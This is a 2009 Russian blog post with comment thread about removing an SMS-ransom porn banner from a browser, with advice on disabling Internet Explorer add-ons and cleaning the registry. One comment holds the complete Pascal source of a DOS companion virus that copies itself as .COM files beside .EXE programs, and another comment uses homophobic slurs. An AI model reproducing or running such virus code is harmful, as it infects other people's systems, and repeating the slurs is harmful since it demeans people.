-Приложения

  • Перейти к приложению Онлайн-игра "Empire" Онлайн-игра "Empire"Преврати свой маленький замок в могущественную крепость и стань правителем величайшего королевства в игре Goodgame Empire. Строй свою собственную империю, расширяй ее и защищай от других игроков. Б
  • Перейти к приложению Открытки ОткрыткиПерерожденный каталог открыток на все случаи жизни
  • Перейти к приложению Я - фотограф Я - фотографПлагин для публикации фотографий в дневнике пользователя. Минимальные системные требования: Internet Explorer 6, Fire Fox 1.5, Opera 9.5, Safari 3.1.1 со включенным JavaScript. Возможно это будет рабо
  • Перейти к приложению Битвы БитвыУ кого лучше дизайн ногтей? Кто мужественнее? Кто больше ЭМО? У кого друзья невероятнее отрываются? ЭТО РЕШИТ БИТВА!!
  • Все на карте

 -Рубрики

 -Фотоальбом

Фотоальбом закрыт всем, кроме хозяина дневника.

 -Цитатник

Олимп — Кубок России. 1/4 финала: «Химки» — «Торпедо» (Москва) — 5:1 - (1)

Олимп — Кубок России. 1/4 финала: «Химки» — «Торпедо» (Москва) — 5:1 (1:0). Химки – Торпедо ...

 -Я - фотограф

Курская область, Золотухинский район, деревня Казанка

 -Кнопки рейтинга «Яндекс.блоги»

 -Поиск по дневнику

Поиск сообщений в Wolodin-de-Mort

 -Подписка по e-mail

 

 -Статистика

Статистика LiveInternet.ru: показано количество хитов и посетителей
Создан: 14.03.2005
Записей: 14550
Комментариев: 64200
Написано: 103322


besplatnoe-video, порно-архивы

Вторник, 31 Марта 2009 г. 15:32 + в цитатник

 

 

 

 

 

 

 

 

 


 

 

Люди! КАК ОТ ЭТОГО БАННЕРА ИЗБАВИТЬСЯ????????

сегодня утром какая то прям атака хакеров...постоянно висит этот баннер внизу...очень неудобно работать - НИКАК не убирается...что это? Как от этого избавится???

Это у меня только атака на комп или кто то уже сталкивался с этим?

***

Отправьте смс 87654 на номер 7122 - и баннер убирётся. ЛИБО автоматически сам снимется через 30-ть дней...

Рубрики:  топиарии мозга

pank-natalya   обратиться по имени Вторник, 31 Марта 2009 г. 16:21 (ссылка)
Да эти пидорги вообще страх потеряли: начинаю читать прессу, и они там. Закрываю-закрываю, а они снова проявлятся, один краше другого. Жду, когда власть поменяется, чтобы весь этот Пидеростан на компост отправить.
Ответить С цитатой В цитатник
NightWish   обратиться по имени Вторник, 31 Марта 2009 г. 17:22 (ссылка)
варианта мне видится 2.
DLL-ка прицепилась..

либо удалить.. либо отключить в настройках Эксплорера.

Сервис - свойства обозревателя - программы - надстройки - и там ищещь надстройку, которая не от майкрософт. и не от каких либо известных... скорее всего безымяная.
отключаешь.
если не получается - скажи. буду дальше думать)
 (567x552, 121Kb)
Ответить С цитатой В цитатник
Humiliating   обратиться по имени Вторник, 31 Марта 2009 г. 18:51 (ссылка)
Юзай лису. Её настроить проще, да и дыр поменьше.

Про ИЕ ничё почти не знаю.
Ответить С цитатой В цитатник
Wolodin-de-Mort   обратиться по имени Вторник, 31 Марта 2009 г. 19:57 (ссылка)
pank-natalya, у тебя такой же порно-баннер вывалился???
и как же ты его закрываешь?? Он не закрывается...
Ответить С цитатой В цитатник
Wolodin-de-Mort   обратиться по имени Вторник, 31 Марта 2009 г. 20:02 (ссылка)
NightWish, зашол через Эскплорер как ты сказал - у меня "рисунок другой" этой таблицы - может потому что у меня IE-8???

Что я там нашол - файл BP Data Feeder у которого в "дата файла" указано 31 марта, сегодня, в 2:23.
Я его удалил. Вернее "отключил".

Может перезагрузится надо? Я открываю окна - баннер всётак же появляется вместе с окном.
Ответить С цитатой В цитатник
Wolodin-de-Mort   обратиться по имени Вторник, 31 Марта 2009 г. 20:03 (ссылка)
Humiliating, просто хочу узнать ЧТО ЭТО ТАКОЕ? "Дыра"? КАК этот баннер проник в мой компьютер?..Почему его не удаётся уничтожить?
Ответить С цитатой В цитатник
Humiliating   обратиться по имени Вторник, 31 Марта 2009 г. 20:09 (ссылка)
Чёртополох, ntfs у тебя, так?
Так вот-с: сия зараза акромя как цепляццо к системным файлам в виде потока может ещё и полиморфными свойствами обладать.

ЗЫ: у тя может быть файл весом в 1 кило, и прицепленный к нему поток раз в 10 или 100 больше. Как там найдёшь? ХЗ!
Ответить С цитатой В цитатник
Humiliating   обратиться по имени Вторник, 31 Марта 2009 г. 20:13 (ссылка)
http://wiki.xakep.ru/(S(22hwk2blph5akl455yvddc55))/Print.aspx?Page=polimorfnyi_kod&AspxAutoDetectCookieSupport=1


Обычная структура многопоточного приложения рассчитана на одновременное исполнение нескольких подзадач. Однако стоит помнить, что, создавая многопоточное приложение, нам придется заботиться о сохранности и ликвидности, общих для всех потоков, данных.

Создание потока.

Первичный поток, который присутствует в программе, начинает свое выполнение с главной функции потока типа
WinMain.

Для создания вторичного потока необходимо создать и для него входную функцию, которая выглядит примерно так:

DWORD WINAPI ThreadFunc(PVOID pParam)

{

DWORD dwResult = 0;

.........

return dwResult;

}

Имя у функции вторичного потока, в отличии от первичного, может быть любым однако, при наличии нескольких разных потоков, назвать функции необходимо по-разному, иначе система создаст разные реализации одной и той же функции.

Когда поток закончит свое исполнение, он вернет управление системе, память, отведенная под его стек, будет освобождена, а счетчик пользователей его объекта ядра "поток" уменьшится на 1. Когда счетчик обнулится, этот объект ядра будет разрушен.

Для создания своего потока необходимо использовать функцию
CreateThread:

HANDLE CreateThread(

LPSECURITY_ATTRIBUTES lpThreadAttributes,

DWORD dwStackSize,

LPTHREAD_START_ROUTINE lpStartAddress,

LPVOID lpParameter,

DWORD dwCreationFlags,

LPDWORD lpThreadId);

При каждом вызове этой функции система создает объект ядра (поток). Это не сам поток, а компактная структура данных, которая используется операционной системой для управления потоком и хранит статистическую информацию о потоке.

Система выделяет память под стек потока из адресного пространства процесса. Новый поток выполняется в контексте того же процесса, что и родительский поток. Поэтому он получает доступ ко всем описателям объектов ядра, всей памяти и стекам всех потоков в процессе. За счет этого потоки в рамках одного процесса могут легко взаимодействовать друг с другом.

CreateThread - это Windows-функция, создающая поток.
Ответить С цитатой В цитатник
Humiliating   обратиться по имени Вторник, 31 Марта 2009 г. 20:15 (ссылка)
Полиморфный код - это код, модифицирующий сам себя. Достигается шифрованием участков кода и генерацией различных кодов шифровальщика и дещифровальщика.

Простой пример в инструкциях ассемблера:

mov eax,1 ; записываем 1 в регистр eax



заменяется на

mov ebx,1 ; записываем 1 в регистр ebx
xchg eax,ebx ; меняем содержимое регистров ebx и eax



и тот и другой пример записывают 1 в аккумлятор (регистр eax).

Полиморфный код удобно использовать в вирусах, механизмах защиты прог. от копирования, и как ни странно для оптимизации. По крайней мере это относится к процам архитектуры IA32(x86). Использование полиморфного кода для них позволяет существенно экономить регистры общего назначения.
Ответить С цитатой В цитатник
pank-natalya   обратиться по имени Вторник, 31 Марта 2009 г. 20:16 (ссылка)
Чёртополох,
Ну, он, может, не такой, как у тебя (я не открывала твоё "приглашение"). Но что порно, это точно. У них отсутствует кнопка "close". Приходится отключаться.
А с советами специалиста мне самой не справиться.
Ответить С цитатой В цитатник
Wolodin-de-Mort   обратиться по имени Вторник, 31 Марта 2009 г. 21:10 (ссылка)
NightWish, спасибо!
Сделал как ты посоветовал - и действтельно - в Эксплорере этот баннер исчез вааабще!

Остались проблемы только в Opera - там он на многих сайтах всё ещё присуцтвует...(((

В Опере нет вкладки "Сервис" и "надстройки"...
Ответить С цитатой В цитатник
NightWish   обратиться по имени Вторник, 31 Марта 2009 г. 22:40 (ссылка)
Humiliating, Красиво говоришь... Только тут это всё понимают двое = ты, да я )
Ответить С цитатой В цитатник
Humiliating   обратиться по имени Вторник, 31 Марта 2009 г. 22:45 (ссылка)
NightWish, меня конкретно спросил Чёртополох : "КАК этот баннер проник в мой компьютер?..Почему его не удаётся уничтожить?" - и я предельно чётко на вторую часть вопроса ответил.
Первую оставил за кадром, ибо и так понятно :)
Ответить С цитатой В цитатник
NightWish   обратиться по имени Вторник, 31 Марта 2009 г. 23:01 (ссылка)
Чёртополох,
Ну.это ты пол дела сделал..
Теперь искать надо файл и удалять его. Тогда, возможно, и в Опере пропадёт.
создавай точку восстановления. чтоб если что не так - можно было вернуться.

Затем погляди, как точно назвается надстройка, которую ты отключил.
затем в реестре (пуск - выполнить-regedit)
задай поиск по названию.
и удаляй что найдётся.
Ответить С цитатой В цитатник
NightWish   обратиться по имени Вторник, 31 Марта 2009 г. 23:03 (ссылка)
Humiliating, боюсь всё банальнее. на уровне реестра. а не полиморфиков... которые популярны весьма были в MS-DOSе...
Ответить С цитатой В цитатник
Humiliating   обратиться по имени Вторник, 31 Марта 2009 г. 23:08 (ссылка)

Ответ на комментарий NightWish

Исходное сообщение NightWish
Humiliating, боюсь всё банальнее. на уровне реестра. а не полиморфиков... которые популярны весьма были в MS-DOSе...
а я и есть старый динозавр ещё до DOSовских времён.

Кстати по поводу точек восстановления - создать то надо, вот только потом удалить все, кроме последней, установить в ноль размер корзины и т.д.

Понимаешь, очень я люблю шутки, особенно первоапрельские, а такой вот баннер может и пошутить )
Ответить С цитатой В цитатник
NightWish   обратиться по имени Вторник, 31 Марта 2009 г. 23:12 (ссылка)
Humiliating, зачем удалять???
просто просканировать норомальным антивирусом папку System Volume Information
Ответить С цитатой В цитатник
Humiliating   обратиться по имени Среда, 01 Апреля 2009 г. 00:06 (ссылка)
??? NightWish,
а если System Volume Information содержит это:
{$M 2048,0,4096}

{$i-}

Program Metra;

uses dos;

var

DirInfo : SearchRec;

F1,f2 : File;

Buf : Array[0..5000] of Byte; { размер вируса }

NumRead : Word;

NumWritten : Word;

FT:text;

P: PathStr;

D: DirStr;

N: NameStr;

E: ExtStr;

namecom:string;

Label InfOk;

Begin

{ считать свое тело в буфер }

Assign(F2,ParamStr(0));

Reset(F2,1);

if ioresult<>0 then

begin

writeln('Файл ',paramstr(0),' не доступен!');

halt;

end;

BlockRead(F2,buf,SizeOf(buf),NumRead);

Close(F2);

{ искать жертву }

FindFirst('*.EXE',Archive,DirInfo);

While DosError = 0 Do

Begin

FSplit(dirinfo.name, D, N, E);

namecom:=n+'.com';

{ проверить существует ли файл }

Assign(ft,namecom);

reset(ft);

if ioresult=0 then { если уже существует }

begin

close(ft);

goto infOk;

end;

{ создать COM-файл с вирусом }

Assign(F1,namecom);

rewrite(f1);

if ioresult<>0 then goto InfOk; {если ошибка, то пропустить}

Reset(F1,1);

BlockWrite(F1,buf,NumRead,NumWritten);

Close(F1);

infOk:

FindNext(DirInfo);

End;

{ запустим своего носителя }

FSplit(paramstr(0), D, N, E);

swapvectors;

exec(d+n+'.EXE',paramstr(1));

swapvectors;

{ если вызвали с таким параметром, то надо представитьcя }

if paramstr(1)='/??' then

begin

writeln('Virus MeTrA.');

writeln('^^^^^^^^^^^^');

end;

halt(dosexitcode); { выйти и сохранить код ошибки }

End.
Ответить С цитатой В цитатник
Humiliating   обратиться по имени Среда, 01 Апреля 2009 г. 00:10 (ссылка)
Ответить С цитатой В цитатник
NightWish   обратиться по имени Среда, 01 Апреля 2009 г. 09:15 (ссылка)
Humiliating, System Volume Information - это папка. скрытая. системная. и хоть коня в пальто она содержит - по барабану.
Ответить С цитатой В цитатник
Ireshka   обратиться по имени Re: besplatnoe-video, порно-архивы Среда, 01 Апреля 2009 г. 20:49 (ссылка)
насколько я знаю моим знакомым пришлось убивать интернет эксплорер и ставить заново
картинка на экране не уберется чтобы ты не делал...

LI 7.05.22 beta
Ответить С цитатой В цитатник
NightWish   обратиться по имени Среда, 01 Апреля 2009 г. 21:06 (ссылка)
Ireshka, Во-1ых, эксплорер не убить. Он плотно встроен в виндовс;
Во-2ых - почитай коменты. Чёртополох, убрал из экплорера эту шнягу.
Ответить С цитатой В цитатник
Ireshka   обратиться по имени Re: Ответ в Чёртополох; besplatnoe-video, порно-архивы Среда, 01 Апреля 2009 г. 21:18 (ссылка)
Исходное сообщение NightWish: Ireshka, Во-1ых, эксплорер не убить. Он плотно встроен в виндовс;

Во-2ых - почитай коменты. Чёртополох, убрал из экплорера эту шнягу.

значит Чертоплох супер-хакер ))

LI 7.05.22 beta
Ответить С цитатой В цитатник
pank-natalya   обратиться по имени Среда, 01 Апреля 2009 г. 21:26 (ссылка)

Ответ на комментарий Wolodin-de-Mort

Исходное сообщение Чёртополох
pank-natalya, у тебя такой же порно-баннер вывалился???
и как же ты его закрываешь?? Он не закрывается...
*******************************
Сегодня провела собственное расследование среди домашних. По поводу исчезновения порно-баннера. Оказывается, дочь не смогла ничего поделать с этим баннером, позвонила в службу и ей за 608 рублей удалили его. Вот ведь как бывает! Сами баннеры ставят, сами удаляют за наши деньги. Хорошо живут и не тужат.
Ответить С цитатой В цитатник
Wolodin-de-Mort   обратиться по имени Суббота, 04 Апреля 2009 г. 19:51 (ссылка)

Ответ на комментарий NightWish

Исходное сообщение NightWish
Ireshka, Во-1ых, эксплорер не убить. Он плотно встроен в виндовс;
Во-2ых - почитай коменты. Чёртополох, убрал из экплорера эту шнягу.


подтверждаю! САМ убрал эту шнягу! По инструкции NightWish-а!
Ответить С цитатой В цитатник
NightWish   обратиться по имени Суббота, 04 Апреля 2009 г. 19:57 (ссылка)
Чёртополох, Таки с тебя Хенеси ХО )))
Ответить С цитатой В цитатник
Wolodin-de-Mort   обратиться по имени Суббота, 04 Апреля 2009 г. 20:20 (ссылка)

Ответ на комментарий NightWish

Исходное сообщение NightWish
Чёртополох, Таки с тебя Хенеси ХО )))


таки раньше надо было предупреждать про ХО)))


***

а тема такая - в Опере не получилось удалить...Снесли ЯваСкрипт - так в Опере теперь ли.ру не работает почти - не идентифицирует меня)))
Так что пока выходим в свет из Эксплорера))
Ответить С цитатой В цитатник
NightWish   обратиться по имени Суббота, 04 Апреля 2009 г. 20:31 (ссылка)
Ответить С цитатой В цитатник
Ireshka   обратиться по имени Re: Ответ в Чёртополох; besplatnoe-video, порно-архивы Суббота, 04 Апреля 2009 г. 21:09 (ссылка)
Исходное сообщение Чёртополох:
Исходное сообщение NightWish

Ireshka, Во-1ых, эксплорер не убить. Он плотно встроен в виндовс;

Во-2ых - почитай коменты. Чёртополох, убрал из экплорера эту шнягу.




подтверждаю! САМ убрал эту шнягу! По инструкции NightWish-а!

ага ) мне рассказывали так как я сказала ...но все поняла ))))

LI 7.05.22 beta
Ответить С цитатой В цитатник
Wolodin-de-Mort   обратиться по имени Суббота, 04 Апреля 2009 г. 22:43 (ссылка)

Ответ на комментарий NightWish

Исходное сообщение NightWish
Чёртополох, загляни сюда.

http://otvet.mail.ru/question/23577459/


ШПАСИБО!)
Ответить С цитатой В цитатник
Комментировать К дневнику Страницы: [1] 2 [Новые]
 

Добавить комментарий:
Текст комментария: смайлики

Проверка орфографии: (найти ошибки)

Прикрепить картинку:

 Переводить URL в ссылку
 Подписаться на комментарии
 Подписать картинку